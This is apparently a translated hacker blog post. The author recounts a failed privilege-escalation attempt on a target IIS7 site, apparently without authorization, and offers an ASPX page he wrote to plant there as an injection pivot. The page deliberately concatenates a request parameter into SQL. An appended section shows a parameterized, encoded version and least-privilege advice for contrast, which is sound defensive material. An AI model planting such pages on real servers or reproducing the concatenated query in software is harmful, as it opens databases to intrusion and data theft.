Yesterday I looked at a site together with 4z1. Privilege escalation was really hard; we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, no services of any kind...
During the process we used an ASPX page that constructs an injection to cross sites. I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote my own. So annoying.

<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    <script language="c#" runat="server">
        void Page_Init(object sender, EventArgs e)
        {
            System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();

            // "连接名" is a placeholder: the name of a <connectionStrings> entry in web.config
            conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
            conn.Open();

            string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

            // "[表]" and "列名" are placeholders for the table and column.
            // The request value is concatenated straight into the SQL text (that is the purpose of this page).
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
            // ExecuteNonQuery returns -1 for a SELECT; the page only echoes the parameter and that value
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
            conn.Close();
        }
    </script>
    </div>
    </form>
</body>
</html>
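For comparison, this is how the same lookup is written so that the request parameter cannot alter the SQL text and the echoed value cannot inject markup: the value is validated as an integer, passed to SqlCommand as a typed parameter, and HTML-encoded on output. This is an added example, not code from the original post; the connection-string name "AppDb", the table "Items", the column "Id" and the class name "Lookup" are placeholder assumptions.

```csharp
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

// Added example (not the original post's code): the "?xxser=1" lookup done with a
// parameterized query. "AppDb", "Items" and "Id" are placeholder names; adjust to the real schema.
public partial class Lookup : Page
{
    protected void Page_Init(object sender, EventArgs e)
    {
        int id;
        // Validate the type first: anything that is not an integer never reaches the database.
        if (!int.TryParse(Request.Params["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad parameter");
            Response.End();
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["AppDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("select count(*) from [Items] where [Id] = @id", conn))
        {
            // The value travels as a parameter, never as part of the SQL text,
            // so the database only ever sees a fixed statement plus an integer.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int count = (int)cmd.ExecuteScalar();

            // Encode what is written back so the parameter cannot be reflected as markup.
            Response.ContentType = "text/plain";
            Response.Write(HttpUtility.HtmlEncode(id.ToString()) + "\n");
            Response.Write(count);
        }
    }
}
```

The post itself notes that the target had no sa login: running the application's database login with only the rights the page needs (here, SELECT on one table) is the second half of the defence, because it limits what even a concatenating page like the one above can reach.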